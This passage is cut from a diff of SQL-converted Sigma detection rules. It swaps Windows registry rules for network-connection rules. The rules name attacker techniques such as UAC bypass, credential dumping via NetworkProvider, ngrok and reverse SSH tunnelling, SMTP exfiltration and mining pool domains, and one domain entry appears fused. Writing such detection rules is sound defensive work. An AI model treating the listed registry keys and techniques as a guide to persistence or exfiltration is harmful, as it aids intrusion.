'bohemianpool.com', 'ca.minexmr.com', 'ca.monero.herominers.com', 'cbd.monerpool.org', 'cbdv2.monerpool.org', 'cryptmonero.com', 'crypto-pool.fr', 'crypto-pool.info', 'cryptonight-hub.miningpoolhub.com', 'd1pool.ddns.net', 'd5pool.us', 'daili01.monerpool.org', 'de.minexmr.com', 'dl.nbminer.com', 'donate.graef.in', 'donate.ssl.xmrig.com', 'donate.v2.xmrig.com', 'donate.xmrig.com', 'donate2.graef.in', 'drill.moneroworld.com', 'dwarfpool.com', 'emercoin.com', 'emercoin.net', 'emergate.net', 'ethereumpool.co', 'eu.luckpool.net', 'eu.minerpool.pw', 'fcn-xmr.pool.minergate.com', 'fee.xmrig.com', 'fr.minexmr.com', 'hellominer.com', 'herominers.com', 'huadong1-aeon.ppxxmr.com', 'iwanttoearn.money', 'jw-js1.ppxxmr.com', 'koto-pool.work', 'lhr.nbminer.com', 'lhr3.nbminer.com', 'linux.monerpool.org', 'lokiturtle.herominers.com', 'luckpool.net', 'masari.miner.rocks', 'mine.c3pool.com', 'mine.moneropool.com', 'mine.ppxxmr.com', 'mine.zpool.ca', 'mine1.ppxxmr.com', 'minemonero.gq', 'miner.ppxxmr.com', 'miner.rocks', 'minercircle.com', 'minergate.com', 'minerpool.pw', 'minerrocks.com', 'miners.pro', 'minerxmr.ru', 'minexmr.cn', 'minexmr.com', 'mining-help.ru', 'miningpoolhub.com', 'mixpools.org', 'moner.monerpool.org', 'moner1min.monerpool.org', 'monero-master.crypto-pool.fr', 'monero.crypto-pool.fr', 'monero.hashvault.pro', 'monero.herominers.com', 'monero.lindon-pool.win', 'monero.miners.pro', 'monero.riefly.id', 'monero.us.to', 'monerocean.stream', 'monerogb.com', 'monerohash.com', 'moneroocean.stream', 'moneropool.com', 'moneropool.nl', 'monerorx.com', 'monerpool.org', 'moriaxmr.com', 'mro.pool.minergate.com', 'multipool.us', 'myxmr.pw', 'na.luckpool.net', 'nanopool.org', 'nbminer.com', 'node3.luckpool.net', 'noobxmr.com', 'pangolinminer.comgandalph3000.com', 'pool.4i7i.com', 'pool.armornetwork.org', 'pool.cortins.tk', 'pool.gntl.co.uk', 'pool.hashvault.pro', 'pool.minergate.com', 'pool.minexmr.com', 'pool.monero.hashvault.pro', 'pool.ppxxmr.com', 'pool.somec.cc', 
'pool.support', 'pool.supportxmr.com', 'pool.usa-138.com', 'pool.xmr.pt', 'pool.xmrfast.com', 'pool2.armornetwork.org', 'poolchange.ppxxmr.com', 'pooldd.com', 'poolmining.org', 'poolto.be', 'ppxvip1.ppxxmr.com', 'ppxxmr.com', 'prohash.net', 'r.twotouchauthentication.online', 'randomx.xmrig.com', 'ratchetmining.com', 'seed.emercoin.com', 'seed.emercoin.net', 'seed.emergate.net', 'seed1.joulecoin.org', 'seed2.joulecoin.org', 'seed3.joulecoin.org', 'seed4.joulecoin.org', 'seed5.joulecoin.org', 'seed6.joulecoin.org', 'seed7.joulecoin.org', 'seed8.joulecoin.org', 'sg.minexmr.com', 'sheepman.mine.bz', 'siamining.com', 'sumokoin.minerrocks.com', 'supportxmr.com', 'suprnova.cc', 'teracycle.net', 'trtl.cnpool.cc', 'trtl.pool.mine2gether.com', 'turtle.miner.rocks', 'us-west.minexmr.com', 'usxmrpool.com', 'viaxmr.com', 'webservicepag.webhop.net', 'xiazai.monerpool.org', 'xiazai1.monerpool.org', 'xmc.pool.minergate.com', 'xmo.pool.minergate.com', 'xmr-asia1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-us.suprnova.cc', 'xmr-usa.dwarfpool.com', 'xmr.2miners.com', 'xmr.5b6b7b.ru', 'xmr.alimabi.cn', 'xmr.bohemianpool.com', 'xmr.crypto-pool.fr', 'xmr.crypto-pool.info', 'xmr.f2pool.com', 'xmr.hashcity.org', 'xmr.hex7e4.ru', 'xmr.ip28.net', 'xmr.monerpool.org', 'xmr.mypool.online', 'xmr.nanopool.org', 'xmr.pool.gntl.co.uk', 'xmr.pool.minergate.com', 'xmr.poolto.be', 'xmr.ppxxmr.com', 'xmr.prohash.net', 'xmr.simka.pw', 'xmr.somec.cc', 'xmr.suprnova.cc', 'xmr.usa-138.com', 'xmr.vip.pool.minergate.com', 'xmr1min.monerpool.org', 'xmrf.520fjh.org', 'xmrf.fjhan.club', 'xmrfast.com', 'xmrigcc.graef.in', 'xmrminer.cc', 'xmrpool.de', 'xmrpool.eu', 'xmrpool.me', 'xmrpool.net', 'xmrpool.xyz', 'xx11m.monerpool.org', 'xx11mv2.monerpool.org', 'xxx.hex7e4.ru', 'zarabotaibitok.ru', 'zer0day.ru')" ], - "filename": "registry_set_hidden_extention.yml" + "filename": 
"net_connection_win_crypto_mining_pools.yml" }, { - "title": "UAC Bypass via Sdclt", - "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "title": "Excel Network Connections", + "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", "status": "experimental", - "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)", - "author": "Omer Yampel, Christian Burkard (Nextron Systems)", + "description": "Detects an Excel process that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "car.2019-04-001" + "attack.execution", + "attack.t1203" ], "falsepositives": [ - "Unknown" + "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", + "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", + "It is highly recommended to baseline your activity and tune out common business use cases." 
], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" ], - "filename": "registry_set_uac_bypass_sdclt.yml" + "filename": "net_connection_win_excel_outbound_network_connection.yml" }, { - "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", - "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "title": "Suspicious Network Connection to IP Lookup Service APIs", + "id": "edf3485d-dac4-4d50-90e4-b0e5813f7e60", "status": "experimental", - "description": "Detects setting a custom URL for 
OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", - "author": "frack113", + "description": "Detects external IP address lookups by non-browser processes via services such as \"api.ipify.org\". This could be indicative of potential post compromise internet test activity.", + "author": "Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1016" ], "falsepositives": [ - "Unknown" + "Legitimate use of the external websites for troubleshooting or network monitoring" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationHostname LIKE '%api.2ip.ua%' ESCAPE '\\' OR DestinationHostname LIKE '%api.ipify.org%' ESCAPE '\\' OR DestinationHostname LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%canireachthe.net%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR DestinationHostname LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR DestinationHostname LIKE '%curlmyip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%edns.ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%eth0.me%' ESCAPE '\\' OR DestinationHostname LIKE '%freegeoip.app%' ESCAPE '\\' OR DestinationHostname LIKE '%icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ident.me%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ifconfig.me%' ESCAPE '\\' 
OR DestinationHostname LIKE '%ip-api.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.anysrc.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ip.tyk.nu%' ESCAPE '\\' OR DestinationHostname LIKE '%ipaddressworld.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipecho.net%' ESCAPE '\\' OR DestinationHostname LIKE '%ipinfo.io%' ESCAPE '\\' OR DestinationHostname LIKE '%ipof.in%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR DestinationHostname LIKE '%ipwho.is%' ESCAPE '\\' OR DestinationHostname LIKE '%l2.io%' ESCAPE '\\' OR DestinationHostname LIKE '%myexternalip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wgetip.com%' ESCAPE '\\' OR DestinationHostname LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR DestinationHostname LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' 
ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\opera.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\safari.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" + "filename": "net_connection_win_susp_external_ip_lookup.yml" }, { - "title": "Enabling COR Profiler Environment Variables", - "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "title": "Rundll32 Internet Connection", + "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", "status": "test", - "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", + "description": "Detects a rundll32 that communicates with public IP addresses", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1574.012" + "attack.t1218.011", + "attack.execution" ], - "level": "high", + "falsepositives": [ + "Communication to other corporate systems that use IP addresses from public address spaces" + ], + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 
'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" ], - "filename": "registry_set_enabling_cor_profiler_env_variables.yml" + "filename": "net_connection_win_rundll32_net_connections.yml" }, { - "title": "Potential Persistence Via App Paths Default Property", - "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "title": "HH.EXE Network Connections", + "id": "468a8cea-2920-4909-a593-0cbe1d96674a", "status": "experimental", - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "description": "Detects network connections made by the \"hh.exe\" process, which could indicate the execution/download of remotely hosted .chm files", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1546.012" + "attack.defense_evasion", + "attack.t1218.001" ], "falsepositives": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' ESCAPE '\\' OR NewValue LIKE '%.ps1%' 
ESCAPE '\\'))" + "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" ], - "filename": "registry_set_persistence_app_paths.yml" + "filename": "net_connection_win_hh.yml" }, { - "title": "Blackbyte Ransomware Registry", - "id": "83314318-052a-4c90-a1ad-660ece38d276", - "status": "test", - "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", - "author": "frack113", + "title": "Script Initiated Connection to Non-Local Network", + "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", + "status": "experimental", + "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Legitimate scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE ((Initiated = 'true' AND (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE 
'172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" ], - "filename": "registry_set_blackbyte_ransomware.yml" + "filename": "net_connection_win_script_wan.yml" }, { - "title": "Potential Persistence Via MyComputer Registry Keys", - "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "title": "Suspicious Outbound SMTP Connections", + "id": "9976fa64-2804-423c-8a5b-646ade840773", "status": "experimental", - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "author": "frack113", "tags": [ - "attack.persistence" + "attack.exfiltration", + "attack.t1048.003" ], "falsepositives": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + "Other SMTP tools" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((DestinationPort IN ('25', '587', '465', 
'2525') AND Initiated = 'true') AND NOT (((NewProcessName LIKE '%\\\\thunderbird.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\microsoft.windowscommunicationsapps\\_%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\HxTsr.exe' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_mycomputer.yml" + "filename": "net_connection_win_susp_outbound_smtp_connections.yml" }, { - "title": "Service Binary in Suspicious Folder", - "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", + "title": "Communication To Ngrok Tunneling Service", + "id": "1d08ac94-400d-4469-a82f-daee9a908849", "status": "experimental", - "description": "Detect the creation of a service with a service binary located in a suspicious directory", - "author": "Florian Roth (Nextron Systems), frack113", + "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.exfiltration", + "attack.command_and_control", + "attack.t1567", + "attack.t1568.002", + "attack.t1572", + "attack.t1090", + "attack.t1102", + "attack.s0508" ], "falsepositives": [ - "Unknown" + "Legitimate use of ngrok" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\')" ], - "filename": "registry_set_creation_service_susp_folder.yml" + "filename": "net_connection_win_ngrok_tunnel.yml" }, { - "title": "Adwind RAT / JRAT - Registry", - "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", - "status": "experimental", - "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", - "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", + "title": "RDP Over Reverse SSH Tunnel", + "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", + "status": "test", + "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", + "author": "Samir Bousseaden", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ], + "falsepositives": [ + "Unknown" 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND NewValue LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" ], - "filename": "registry_set_mal_adwind.yml" + "filename": "net_connection_win_rdp_reverse_tunnel.yml" }, { - "title": "Potential Credential Dumping Attempt Using New NetworkProvider - REG", - "id": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "status": "experimental", - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Program Location with Network Connections", + "id": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "status": "test", + "description": "Detects programs with network connections running in suspicious files system locations", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Other legitimate network providers used and not filtred in this rule" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NetworkProvider%' ESCAPE '\\') AND NOT (((TargetObject LIKE 
